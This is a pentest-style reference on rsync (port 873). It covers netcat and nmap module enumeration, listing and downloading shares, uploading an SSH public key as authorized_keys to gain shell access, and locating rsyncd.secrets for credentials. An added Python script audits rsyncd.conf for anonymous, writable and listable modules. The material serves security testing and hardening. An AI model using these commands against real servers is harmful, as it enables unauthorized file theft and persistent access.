- Basic information
- rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers by comparing the modification times and sizes of files.
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0 <--- You receive this banner with the version from the server
@RSYNCD: 31.0 <--- Then you send the same info
#list <--- Then you ask the server to list
raidroot <--- The server starts enumerating
USBCopy
NAS_Public
_NAS_Recycle_TOSRAID <--- Enumeration finished
@RSYNCD: EXIT <--- Server closes the connection
#Now let's try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password
- Enumerate shared folders
- An rsync module is essentially a directory share. These modules can optionally be protected by a password.
- The following options list the available modules and, optionally, determine whether each module requires a password to access:
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list
#Example using IPv6 and a different port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
- Manual Rsync
- List a shared folder
rsync -av --list-only rsync://10.10.232.5/shared_name
- Copy all files to your local machine via the following command:
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
- If you have credentials you can list/download a shared name using (you will be prompted for the password):
rsync -av --list-only rsync://<USER>@<IP>/shared_name
rsync -av rsync://<USER>@<IP>:8730/shared_name ./rsyn_shared
- You could also upload some content using rsync (for example, in this case we can upload an authorized_keys file to obtain access to the box):
rsync -av home_user/.ssh/ rsync://<USER>@<IP>/home_user/.ssh
#full command syntax below
rsync -av id_rsa.pub rsync://<USER>@<IP>/files/sys-internal/.ssh/authorized_keys
- Find the rsyncd configuration file:
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
- Inside the config file you can sometimes find the parameter
secrets file = /path/to/file
and this file could contain the usernames and passwords allowed to authenticate to rsyncd.
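- The module, password and secrets file settings above can be checked from the server side. The following is an added example, not part of the original page or of rsync itself: a small auditor that parses an rsyncd.conf and flags modules that accept connections without a password, accept uploads, or show up in module enumeration. The sample configuration is constructed (module names reuse the listing above; paths and user names are assumptions), and include directives are not followed.

```python
# Added example. SAMPLE_CONF is constructed; paths and user names are illustrative.
SAMPLE_CONF = """\
secrets file = /etc/rsyncd.secrets
[raidroot]
    path = /volume1/raidroot
    auth users = backup
    read only = yes
[NAS_Public]
    path = /volume1/public
    read only = no
[USBCopy]
    path = /volume1/usb
    list = no
    auth users = admin
    read only = false
"""
TRUE = {"yes", "true", "1"}  # rsyncd.conf booleans, compared case-insensitively

def parse_rsyncd_conf(text):
    """Return {module: params}; each module inherits the global parameters."""
    global_params, modules, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = modules.setdefault(line[1:-1].strip(), dict(global_params))
        elif line and not line.startswith("#") and "=" in line:
            key, _, value = line.partition("=")  # split on the first '=' only
            target = global_params if current is None else current
            target["".join(key.lower().split())] = value.strip()  # "auth users" -> "authusers"
    return modules

def audit(text):
    """Return {module: [findings]}, each finding prefixed with a short code."""
    report = {}
    for name, p in parse_rsyncd_conf(text).items():
        findings = []
        if not p.get("authusers"):
            findings.append("anonymous: no 'auth users', no password is requested")
        elif not p.get("secretsfile"):
            findings.append("no-secrets: 'auth users' set without a 'secrets file'")
        if p.get("readonly", "yes").lower() not in TRUE:  # default is read only
            findings.append("writable: 'read only' is off, uploads are accepted")
        if p.get("list", "yes").lower() in TRUE:  # default is listable
            findings.append("listable: returned by module enumeration")
        report[name] = findings
    return report

if __name__ == "__main__":
    for module, findings in audit(SAMPLE_CONF).items():
        print(module, findings or "ok")
```

A module that is both anonymous and writable is the case the upload step above depends on; setting `auth users` with a `secrets file` and leaving `read only` at its default closes it.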